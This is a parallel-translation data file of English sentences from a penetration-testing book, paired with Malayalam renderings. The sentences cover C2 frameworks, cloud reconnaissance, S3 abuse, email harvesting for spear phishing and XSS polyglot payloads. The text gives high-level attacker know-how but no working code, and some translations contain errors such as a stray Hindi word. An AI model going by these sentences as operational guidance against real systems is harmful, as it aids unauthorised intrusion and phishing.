Cyber-Parallel-Dataset-Indic / ml /The Hacker Playbook 3 Practical Guide To Penetration Testing_indic_translation.jsonl
| {"en":"The book is about penetration testing.","translation":"ഈ പുസ്തകം പെനെട്രേഷൻ ടെസ്റ്റിംഗിനെക്കുറിച്ചാണ്.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"This edition focuses on Red Team techniques.","translation":"ഈ പതിപ്പ് റെഡ് ടീം ടെക്നിക്കുകളിൽ ശ്രദ്ധ കേന്ദ്രീകരിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"The author discusses various attack methods.","translation":"രചയിതാവ് വിവിധ ആക്രമണ രീതികളെക്കുറിച്ച് ചർച്ച ചെയ്യുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"He covers topics like web application exploitation.","translation":"വെബ് ആപ്ലിക്കേഷൻ ചൂഷണങ്ങൾ പോലുള്ള വിഷയങ്ങൾ അദ്ദേഹം ഉൾക്കൊള്ളുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"The book also includes social engineering examples.","translation":"സാമൂഹിക എഞ്ചിനിയറിംഗിന്റെ ഉദാഹരണങ്ങളും പുസ്തകത്തിൽ ഉൾപ്പെടുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Physical attacks are also a part of the content.","translation":"ശാരീരിക ആക്രമണങ്ങളെക്കുറിച്ചും ഇതിൽ പറയുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Evading AV and network detection is crucial.","translation":"AV-യെയും നെറ്റ്വർക്ക് ഡിറ്റക്ഷനെയും ഒഴിവാക്കുന്നത് നിർണായകമാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"The book provides practical guides.","translation":"പുസ്തകം പ്രായോഗിക മാർഗ്ഗനിർദ്ദേശങ്ങൾ നൽകുന്നു.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"It helps readers understand attacker's mindset.","translation":"ആക്രമണകാരിയുടെ ചിന്താഗതി മനസ്സിലാക്കാൻ ഇത് വായനക്കാരെ സഹായിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"The author shares his experience in the field.","translation":"ഈ രംഗത്തെ തന്റെ അനുഭവങ്ങൾ രചയിതാവ് പങ്കുവെക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"The book is intended for security professionals.","translation":"സുരക്ഷാ വിദഗ്ധരെ ഉദ്ദേശിച്ചുള്ളതാണ് ഈ പുസ്തകം.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"It also includes information on Red Team campaigns.","translation":"റെഡ് ടീം കാമ്പെയ്നുകളെക്കുറിച്ചുള്ള വിവരങ്ങളും ഇതിൽ ഉൾപ്പെടുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"The book emphasizes the importance of security.","translation":"സുരക്ഷയുടെ പ്രാധാന്യം പുസ്തകം ഊന്നിപ്പറയുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Readers are encouraged to build their own labs.","translation":"സ്വന്തമായി ലാബുകൾ നിർമ്മിക്കാൻ വായനക്കാരെ പ്രോത്സാഹിപ്പിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"The book covers topics like privilege escalation.","translation":"പ്രിവിലേജ് എസ്കലേഷൻ പോലുള്ള വിഷയങ്ങൾ പുസ്തകത്തിൽ ഉൾപ്പെടുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"It provides insights into network security.","translation":"നെറ്റ്വർക്ക് സുരക്ഷയെക്കുറിച്ച് ഉൾക്കാഴ്ച നൽകുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"The book is a valuable resource for learning.","translation":"പഠനത്തിന് വളരെ വിലപ്പെട്ട ഒരു resource ആണിത്.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"The author discusses the importance of reporting.","translation":"റിപ്പോർട്ടിംഗിന്റെ പ്രാധാന്യത്തെക്കുറിച്ച് രചയിതാവ് ചർച്ച ചെയ്യുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"The book aims to help readers become heroes.","translation":"വായനക്കാരെ നായകന്മാരാക്കുക എന്നതാണ് ഈ പുസ്തകത്തിന്റെ ലക്ഷ്യം.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"The book is a practical guide to penetration testing and red teaming.","translation":"പെനെട്രേഷൻ ടെസ്റ്റിംഗിനും റെഡ് ടീമിംഗിനുമുള്ള ഒരു പ്രായോഗിക വഴികാട്ടിയാണ് ഈ പുസ്തകം.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Pupy is an opensource, cross-platform remote administration tool.","translation":"Pupy ഒരു ഓപ്പൺ സോഴ്സ്, ക്രോസ്-പ്ലാറ്റ്ഫോം വിദൂര ഭരണ ഉപകരണമാണ്.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"You can run Python across all of your agents without having Python installed on all hosts.","translation":"എല്ലാ ഹോസ്റ്റുകളിലും പൈത്തൺ ഇൻസ്റ്റാൾ ചെയ്യാതെ തന്നെ നിങ്ങളുടെ എല്ലാ ഏജന്റുകളിലും നിങ്ങൾക്ക് പൈത്തൺ പ്രവർത്തിപ്പിക്കാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"PoshC2 is a proxy aware C2 framework written completely in PowerShell.","translation":"PoshC2 പൂർണ്ണമായും PowerShell-ൽ എഴുതിയ ഒരു പ്രോക്സി-അവബോധ C2 ഫ്രെയിംവർക്കാണ്.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Merlin takes advantage of a recently developed protocol called HTTP/2.","translation":"മെർലിൻ അടുത്തിടെ വികസിപ്പിച്ച HTTP/2 എന്ന പ്രോട്ടോക്കോൾ പ്രയോജനപ്പെടുത്തുന്നു.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Nishang is useful during all phases of penetration testing.","translation":"പെനെട്രേഷൻ ടെസ്റ്റിംഗിന്റെ എല്ലാ ഘട്ടങ്ങളിലും നിഷാങ് ഉപയോഗപ്രദമാണ്.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Being ready for any scenario will help you get around any obstacle.","translation":"ഏത് സാഹചര്യത്തിനും തയ്യാറെടുക്കുന്നത് ഏതൊരു തടസ്സവും മറികടക്കാൻ നിങ്ങളെ സഹായിക്കും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"We are going to continue this tradition and expand on the reconnaissance phase.","translation":"നമ്മൾ ഈ പാരമ്പര്യം തുടരുകയും രഹസ്യാന്വേഷണ ഘട്ടം വികസിപ്പിക്കുകയും ചെയ്യും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"These activities allow you to gather more information about the victim’s infrastructure.","translation":"ഈ പ്രവർത്തനങ്ങൾ ഇരയുടെ അടിസ്ഥാന സൗകര്യങ്ങളെക്കുറിച്ച് കൂടുതൽ വിവരങ്ങൾ ശേഖരിക്കാൻ നിങ്ങളെ അനുവദിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"For client networks that are generally not too large, we set up simple cronjobs.","translation":"വലിയ ക്ലയിന്റ് നെറ്റ്വർക്കുകൾ ഇല്ലാത്തവർക്കായി, ഞങ്ങൾ ലളിതമായ ക്രോൺജോബുകൾ സജ്ജീകരിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"We can then take the output of this script and use it to notify our team.","translation":"തുടർന്ന് ഈ സ്ക്രിപ്റ്റിന്റെ ഔട്ട്പുട്ട് എടുത്ത് ഞങ്ങളുടെ ടീമിനെ അറിയിക്കാൻ ഉപയോഗിക്കാം.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"It is great for doing our initial reconnaissance, but generally isn't used for diffing.","translation":"ആരംഭത്തിലുള്ള രഹസ്യാന്വേഷണത്തിന് ഇത് മികച്ചതാണ്, എന്നാൽ സാധാരണയായി ഇത് ഡിഫിംഗിനായി ഉപയോഗിക്കാറില്ല.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"I highly recommend you spend the time to make our tools better.","translation":"ഞങ്ങളുടെ ടൂളുകൾ മെച്ചപ്പെടുത്താൻ നിങ്ങൾ സമയം ചെലവഴിക്കാൻ ഞാൻ വളരെ ശുപാർശ ചെയ്യുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Other than regularly scanning for open ports/services, it is important for Red Teams to also monitor for different web applications.","translation":"തുറന്ന പോർട്ടുകളും സേവനങ്ങളും പതിവായി സ്കാൻ ചെയ്യുന്നതിനു പുറമേ, വ്യത്യസ്ത വെബ് ആപ്ലിക്കേഷനുകൾക്കായി റെഡ് ടീമുകൾ നിരീക്ഷിക്കേണ്ടതും പ്രധാനമാണ്.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Eyewitness is another great tool that takes an XML file from nmap output.","translation":"nmap ഔട്ട്പുട്ടിൽ നിന്നുള്ള ഒരു XML ഫയൽ എടുക്കുന്ന മികച്ച മറ്റൊരു ഉപകരണമാണ് ഐവിറ്റ്നെസ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"As more and more companies switch over to using different cloud infrastructures, a lot of new and old attacks come to light.","translation":"കൂടുതൽ കൂടുതൽ കമ്പനികൾ വ്യത്യസ്ത ക്ലൗഡ് ഇൻഫ്രാസ്ട്രക്ചറുകൾ ഉപയോഗിക്കുന്നതിലേക്ക് മാറുമ്പോൾ, നിരവധി പുതിയതും പഴയതുമായ ആക്രമണങ്ങൾ വെളിച്ചത്ത് വരുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"For Red Teamers, a problem is how do we search on different cloud environments?","translation":"റെഡ് ടീമർമാർക്ക്, വ്യത്യസ്ത ക്ലൗഡ് പരിതസ്ഥിതികളിൽ എങ്ങനെ തിരയുമെന്നതാണ് പ്രശ്നം?","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Shodan is a great service that regularly scans the internet.","translation":"Shodan, ഇന്റർനെറ്റ് പതിവായി സ്കാൻ ചെയ്യുന്ന ഒരു മികച്ച സേവനമാണ്.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"One of the best features of Censys is that it scrapes information from SSL certificates.","translation":"Censys-ൻ്റെ ഏറ്റവും മികച്ച സവിശേഷതകളിലൊന്ന്, SSL സർട്ടിഫിക്കറ്റുകളിൽ നിന്ന് വിവരങ്ങൾ ശേഖരിക്കുന്നു എന്നതാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"We commonly find that companies do not realize what they have available on the internet.","translation":"കമ്പനികൾക്ക് ഇന്റർനെറ്റിൽ എന്താണ് ലഭ്യമാകുന്നതെന്ന് പലപ്പോഴും മനസ്സിലാകുന്നില്ല.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"We can look up IP address space to owners, search Networks owned by companies, Autonomous System Numbers by organization, and more.","translation":"സ്ഥാപനങ്ങളുടെ ഉടമസ്ഥാവകാശം, കമ്പനികളുടെ ഉടമസ്ഥതയിലുള്ള നെറ്റ്വർക്കുകൾ, ഓർഗനൈസേഷൻ അനുസരിച്ച് ഓട്ടോനോമസ് സിസ്റ്റം നമ്പറുകൾ എന്നിവയും അതിലേറെയും നമുക്ക് പരിശോധിക്കാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"The client wants you to use?","translation":"ക്ലയിന്റ് നിങ്ങളെ എന്ത് ഉപയോഗിക്കാനാണ് ആഗ്രഹിക്കുന്നത്?","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Will it be COTS offensive tools like Metasploit, Cobalt Strike, DNS Cat?","translation":"മെറ്റാസ്പ്ലോയിറ്റ്, കോബാൾട്ട് സ്ട്രൈക്ക്, ഡിഎൻഎസ് ക്യാറ്റ് തുടങ്ങിയ COTS ആക്രമണോപാധികൾ ആയിരിക്കുമോ ഇത്?","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Or custom tools?","translation":"അതോ ഇഷ്ടമുള്ള ടൂളുകളോ?","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"The best part is that getting caught is part of the assessment.","translation":"പിടിക്കപ്പെടുന്നത് വിലയിരുത്തലിന്റെ ഭാഗമാണ് എന്നതാണ് ഏറ്റവും വലിയ കാര്യം.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"There are some campaigns where we get caught 4 or 5 times and have to burn 4 or 5 different environments.","translation":"ചില കാമ്പെയ്നുകളിൽ, ഞങ്ങൾ 4 അല്ലെങ്കിൽ 5 തവണ പിടിയിലാകുകയും 4 അല്ലെങ്കിൽ 5 വ്യത്യസ്ത പരിതസ്ഥിതികൾ നശിപ്പിക്കേണ്ടിവരികയും ചെയ്യുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"This really shows to your client that their defenses are working (or not working) based on what results they expected.","translation":"നിങ്ങൾ പ്രതീക്ഷിച്ച ഫലങ്ങൾ അനുസരിച്ച് അവരുടെ പ്രതിരോധം പ്രവർത്തിക്കുന്നുണ്ടോ (അല്ലെങ്കിൽ പ്രവർത്തിക്കുന്നില്ലേ) എന്ന് ഇത് നിങ്ങളുടെ ക്ലയിന്റിനെ കാണിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"At the end of the book, I will provide some reporting examples of how we capture metrics and report that data.","translation":"പുസ്തകത്തിന്റെ അവസാനം, മെട്രിക്സുകൾ എങ്ങനെ ശേഖരിക്കാമെന്നും ആ ഡാറ്റ എങ്ങനെ റിപ്പോർട്ട് ചെയ്യാമെന്നും ചില റിപ്പോർട്ടിംഗ് ഉദാഹരണങ്ങൾ ഞാൻ നൽകും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Setting Up Your External Servers","translation":"നിങ്ങളുടെ ബാഹ്യ സെർവറുകൾ സ്ഥാപിക്കുന്നു","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"In today's world with the abundance of Virtual Private Servers (VPS), standing up your attacker machines on the internet won't break your budget.","translation":"ഇന്നത്തെ കാലത്ത്, വിർച്വൽ പ്രൈവറ്റ് സെർവറുകളുടെ (VPS) ധാരാളിത്തം ഉള്ളതുകൊണ്ട്, ഇന്റർനെറ്റിൽ നിങ്ങളുടെ ആക്രമണ യന്ത്രങ്ങൾ സ്ഥാപിക്കുന്നത് നിങ്ങളുടെ ബഡ്ജറ്റിനെ ബാധിക്കില്ല.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"For example, I commonly use Digital Ocean Droplets or Amazon Web Services (AWS) Lightsail servers to configure my VPS servers.","translation":"ഉദാഹരണത്തിന്, എന്റെ VPS സെർവറുകൾ കോൺഫിഗർ ചെയ്യാൻ ഞാൻ സാധാരണയായി ഡിജിറ്റൽ ഓഷ്യൻ ഡ്രോപ്ലെറ്റുകളോ Amazon Web Services (AWS) ലൈറ്റ്സെയിൽ സെർവറുകളോ ഉപയോഗിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"The reasons I use these services are because they are generally very low cost (sometimes free), allow for Ubuntu servers, allow for servers in all sorts of regions, and most importantly, are very easy to set up.","translation":"ഈ സേവനങ്ങൾ ഉപയോഗിക്കാനുള്ള കാരണങ്ങൾ ഇവയാണ്: അവ സാധാരണയായി വളരെ കുറഞ്ഞ ചിലവുള്ളവയാണ് (ചിലപ്പോൾ സൗജന്യമാണ്), Ubuntu സെർവറുകൾ അനുവദിക്കുന്നു, എല്ലാത്തരം മേഖലകളിലെയും സെർവറുകൾ അനുവദിക്കുന്നു, ഏറ്റവും പ്രധാനമായി, സജ്ജീകരിക്കാൻ വളരെ എളുപ്പമാണ്.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Within minutes, you can have multiple servers set up and running Metasploit and Empire services.","translation":"നിമിഷങ്ങൾക്കകം, നിങ്ങൾക്ക് ഒന്നിലധികം സെർവറുകൾ സജ്ജീകരിക്കാനും മെറ്റാസ്പ്ലോയിറ്റും എംപയർ സേവനങ്ങളും പ്രവർത്തിപ്പിക്കാനും കഴിയും.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"I am going to focus on AWS Lightsail servers in this book, due to the ease in setting up, ability to automate services, and the amount of traffic normally going to AWS.","translation":"സജ്ജീകരിക്കുന്നതിലെ എളുപ്പം, സേവനങ്ങൾ ഓട്ടോമേറ്റ് ചെയ്യാനുള്ള കഴിവ്, സാധാരണയായി AWS-ലേക്ക് പോകുന്ന ട്രാഫിക്കിന്റെ അളവ് എന്നിവ കാരണം, ഈ പുസ്തകത്തിൽ ഞാൻ AWS ലൈറ്റ്സെയിൽ സെർവറുകളിൽ ശ്രദ്ധ കേന്ദ്രീകരിക്കും.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"After you have fully created an image you like, you can rapidly clone that image to multiple servers, which makes it extremely easy to build ready-made Command and Control boxes.","translation":"നിങ്ങൾ ഇഷ്ടപ്പെടുന്ന ഒരു ചിത്രം പൂർണ്ണമായി സൃഷ്ടിച്ച ശേഷം, നിങ്ങൾക്ക് ആ ചിത്രം ഒന്നിലധികം സെർവറുകളിലേക്ക് വേഗത്തിൽ ക്ലോൺ ചെയ്യാൻ കഴിയും, ഇത് റെഡിമെയ്ഡ് കമാൻഡ് ആൻഡ് കൺട്രോൾ ബോക്സുകൾ നിർമ്മിക്കുന്നത് വളരെ എളുപ്പമാക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"Again, you should make sure you abide by the VPS provider's service terms so you do not fall into any problems.","translation":"വീണ്ടും, നിങ്ങൾ VPS ദാതാവിന്റെ സേവന നിബന്ധനകൾ പാലിക്കുന്നുണ്ടെന്ന് ഉറപ്പാക്കുക, അതുവഴി നിങ്ങൾക്ക് ഒരു പ്രശ്നവും ഉണ്ടാകില്ല.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Create an Instance","translation":"ഒരു ഇൻസ്റ്റൻസ് ഉണ്ടാക്കുക","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"I highly recommend getting at least 1 GB of RAM","translation":"കുറഞ്ഞത് 1 GB RAM എങ്കിലും ലഭിക്കാൻ ഞാൻ വളരെ ശുപാർശ ചെയ്യുന്നു","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Storage space usually isn't an issue","translation":"സംഭരണ സ്ഥലം സാധാരണയായി ഒരു പ്രശ്നമല്ല","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Linux/Unix OS Only -> Ubuntu","translation":"Linux/Unix OS മാത്രം -> Ubuntu","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Download Cert","translation":"സർട്ടിഫിക്കറ്റ് ഡൗൺലോഡ് ചെയ്യുക","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"If we have write access, it could allow complete RCE of their applications.","translation":"നമുക്ക് എഴുതാനുള്ള അനുമതിയുണ്ടെങ്കിൽ, അവരുടെ ആപ്ലിക്കേഷനുകളുടെ പൂർണ്ണമായ RCE-ക്ക് ഇത് അനുവദിച്ചേക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"We have often seen that when files stored on S3 buckets are used on all of their pages, we can put our malicious code on their web application servers.","translation":"S3 ബക്കറ്റുകളിൽ സംഭരിച്ചിട്ടുള്ള ഫയലുകൾ അവരുടെ എല്ലാ പേജുകളിലും ഉപയോഗിക്കുമ്പോൾ, ഞങ്ങളുടെ ദോഷകരമായ കോഡ് അവരുടെ വെബ് ആപ്ലിക്കേഷൻ സെർവറുകളിൽ സ്ഥാപിക്കാൻ കഴിയുമെന്ന് ഞങ്ങൾ പലപ്പോഴും കണ്ടിട്ടുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"When analyzing AWS security, we need to review the controls around permissions on objects and buckets.","translation":"AWS സുരക്ഷയെക്കുറിച്ച് വിശകലനം ചെയ്യുമ്പോൾ, ഒബ്ജക്റ്റുകളിലെയും ബക്കറ്റുകളിലെയും അനുമതികളെക്കുറിച്ചുള്ള നിയന്ത്രണങ്ങൾ ഞങ്ങൾ അവലോകനം ചെയ്യേണ്ടതുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Subdomain takeovers are a common vulnerability we see with almost every company these days.","translation":"സബ്ഡൊമെയ്ൻ ഏറ്റെടുക്കൽ ഈ ദിവസങ്ങളിൽ മിക്കവാറും എല്ലാ കമ്പനികളിലും കാണുന്ന ഒരു സാധാരണ ദൗർബല്യമാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"If they ever forget to configure the third party service or deregister from that server, an attacker can take over that hostname with the third party.","translation":"അവർ മൂന്നാം കക്ഷി സേവനം കോൺഫിഗർ ചെയ്യാനോ അല്ലെങ്കിൽ ആ സെർവറിൽ നിന്ന് രജിസ്റ്റർ ചെയ്യാൻ മറന്നുപോയാൽ, ഒരു ആക്രമണകാരിക്ക് മൂന്നാം കക്ഷിയുമായി ആ ഹോസ്റ്റ്നാമം ഏറ്റെടുക്കാൻ കഴിയും.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"One tool to check for vulnerable subdomains is called tko-subs.","translation":"ദുർബലമായ സബ്ഡൊമെയ്നുകൾ പരിശോധിക്കുന്നതിനുള്ള ഒരു ഉപകരണം tko-subs എന്ന് വിളിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"A huge part of any social engineering attack is to find email addresses and names of employees.","translation":"ഏതൊരു സോഷ്യൽ എഞ്ചിനിയറിംഗ് ആക്രമണത്തിൻ്റെയും വലിയൊരു ഭാഗം ജീവനക്കാരുടെ ഇമെയിൽ വിലാസങ്ങളും പേരുകളും കണ്ടെത്തുക എന്നതാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"We used Discover Script in the previous chapters, which is great for collecting much of this data.","translation":"ഈ ഡാറ്റയുടെ വലിയൊരു ഭാഗം ശേഖരിക്കുന്നതിന് സഹായകമായ ഡിസ്കവർ സ്ക്രിപ്റ്റ് നമ്മൾ മുൻ അധ്യായങ്ങളിൽ ഉപയോഗിച്ചിട്ടുണ്ട്.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Once you get a small list of emails, it is good to understand their email format.","translation":"നിങ്ങൾക്ക് കുറച്ച് ഇമെയിലുകൾ ലഭിച്ചുകഴിഞ്ഞാൽ, അവരുടെ ഇമെയിൽ ഫോർമാറ്റ് മനസ്സിലാക്കുന്നത് നല്ലതാണ്.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"We all know that spear phishing is still one of the more successful avenues of attack.","translation":"സ്പിയർ ഫിഷിംഗ് ഇപ്പോഴും ആക്രമണത്തിൻ്റെ ഏറ്റവും വിജയകരമായ വഴികളിൽ ഒന്നാണെന്ന് നമുക്കെല്ലാവർക്കും അറിയാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"To build a good list of email addresses, we can use a tool like SimplyEmail.","translation":"ഒരു നല്ല ഇമെയിൽ വിലാസങ്ങളുടെ ലിസ്റ്റ് ഉണ്ടാക്കാൻ, SimplyEmail പോലുള്ള ഒരു ഉപകരണം ഉപയോഗിക്കാം.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"This may take a long time to run as it checks Bing, Yahoo, Google, Ask Search, PGP Repos, files, and much more.","translation":"ബിംഗ്, യാഹൂ, ഗൂഗിൾ, ആസ്ക് സെർച്ച്, പിജിപി റെപ്പോകൾ, ഫയലുകൾ എന്നിവയും അതിലേറെയും പരിശോധിക്കുന്നതിനാൽ ഇത് പ്രവർത്തിക്കാൻ കൂടുതൽ സമയമെടുത്തേക്കാം.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"One of the best ways to get email accounts is to continually monitor and capture past breaches.","translation":"ഇമെയിൽ അക്കൗണ്ടുകൾ നേടുന്നതിനുള്ള ഏറ്റവും നല്ല മാർഗ്ഗങ്ങളിലൊന്ന്, മുൻകാല ലംഘനങ്ങൾ തുടർച്ചയായി നിരീക്ഷിക്കുകയും പിടിച്ചെടുക്കുകയും ചെയ്യുക എന്നതാണ്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"In this chapter we went over all the different reconnaissance tactics and tools of the trade.","translation":"ഈ അധ്യായത്തിൽ, വിവിധ രഹസ്യാന്വേഷണ തന്ത്രങ്ങളെക്കുറിച്ചും വ്യാപാരത്തിൻ്റെ ഉപകരണങ്ങളെക്കുറിച്ചും നമ്മൾ ചർച്ച ചെയ്തു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"There is no doubt we will continue to see many other severe breaches from public internet facing end-points.","translation":"പൊതു ഇന്റർനെറ്റ് എൻഡ്-പോയിന്റുകളിൽ നിന്നുള്ള മറ്റ് നിരവധി ഗുരുതരമായ ലംഘനങ്ങൾ ഞങ്ങൾ തുടർന്നും കാണുമെന്നതിൽ സംശയമില്ല.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"The security industry, as a whole, runs in a cyclical pattern.","translation":"സുരക്ഷാ വ്യവസായം മൊത്തത്തിൽ ഒരു चक्रीय പാറ്റേണിലാണ് പ്രവർത്തിക്കുന്നത്.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"Since this book is geared more toward Red Teaming concepts, we will not go too deeply into all of the different web vulnerabilities or how to manually exploit them.","translation":"ഈ പുസ്തകം റെഡ് ടീമിംഗ് ആശയങ്ങളുമായി ബന്ധപ്പെട്ടുള്ളതുകൊണ്ട്, വിവിധ വെബ് ദൗർബല്യങ്ങളെക്കുറിച്ചോ അല്ലെങ്കിൽ അവ എങ്ങനെ സ്വമേധയാ ചൂഷണം ചെയ്യാമെന്നതിനെക്കുറിച്ചോ നമ്മൾ ആഴത്തിൽ പോകുന്നില്ല.","target_lang":"ml","domain":"technical","complexity":"complex"} | |
| {"en":"My best recommendation is to do it against real, live systems.","translation":"യഥാർത്ഥ, ലൈവ് സിസ്റ്റങ്ങൾക്കെതിരെ ഇത് ചെയ്യുക എന്നതാണ് എൻ്റെ ഏറ്റവും മികച്ച ശുപാർശ.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"These programs can pay anywhere from Free to $20k+.","translation":"ഈ പ്രോഗ്രാമുകൾ സൗജന്യമായി $20k-ൽ കൂടുതൽ നൽകും.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"You stumble across the externally-facing Cyber Space Kittens chat support system.","translation":"നിങ്ങൾ ബാഹ്യമായി കാണുന്ന സൈബർ സ്പേസ് കിറ്റൻസ് ചാറ്റ് സപ്പോർട്ട് സിസ്റ്റത്തിൽ എത്തുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Try the different entity attacks and obfuscated payloads.","translation":"വിവിധ എൻ്റിറ്റി ആക്രമണങ്ങളും അവ്യക്തമായ പേലോഡുകളും പരീക്ഷിക്കുക.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"This is a great document that breaks down different XSS payloads based on where your input is served.","translation":"നിങ്ങളുടെ ഇൻപുട്ട് എവിടെയാണ് നൽകുന്നതെന്നതിനെ ആശ്രയിച്ച് വ്യത്യസ്ത XSS പേലോഡുകൾ തരംതിരിക്കുന്ന ഒരു മികച്ച ഡോക്യുമെൻ്റാണിത്.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Another great resource that discusses which browsers are vulnerable to which XSS payloads is: https://html5sec.org/.","translation":"ഏത് ബ്രൗസറുകളാണ് XSS പേലോഡുകൾക്ക് ഇരയാകുന്നത് എന്നതിനെക്കുറിച്ച് ചർച്ച ചെയ്യുന്ന മറ്റൊരു മികച്ച resource ഇതാ: https://html5sec.org/.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"Trying to find that initial XSS pop-up can take a long time.","translation":"ആദ്യകാല XSS പോപ്പ്-അപ്പ് കണ്ടെത്താൻ ശ്രമിക്കുന്നത് വളരെ സമയമെടുക്കും.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"What if we could try and chain multiple payloads into a single request?","translation":"ഒരൊറ്റ അഭ്യർത്ഥനയിലേക്ക് ഒന്നിലധികം പേലോഡുകൾ ശൃംഖല ചെയ്യാൻ നമുക്ക് ശ്രമിച്ചാലോ?","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
| {"en":"This last type of payload is called a Polyglot.","translation":"ഈ അവസാന തരം പേലോഡിനെ പോളിഗ്ലോട്ട് എന്ന് വിളിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"simple"} | |
| {"en":"A Polyglot payload takes many different types of payload/obfuscation techniques and compiles them into one attack.","translation":"പോളിഗ്ലോട്ട് പേലോഡ് വ്യത്യസ്ത തരം പേലോഡുകളും അവ്യക്തമാക്കാനുള്ള ടെക്നിക്കുകളും എടുത്ത് ഒരൊറ്റ ആക്രമണമായി ക്രമീകരിക്കുന്നു.","target_lang":"ml","domain":"technical","complexity":"moderate"} | |
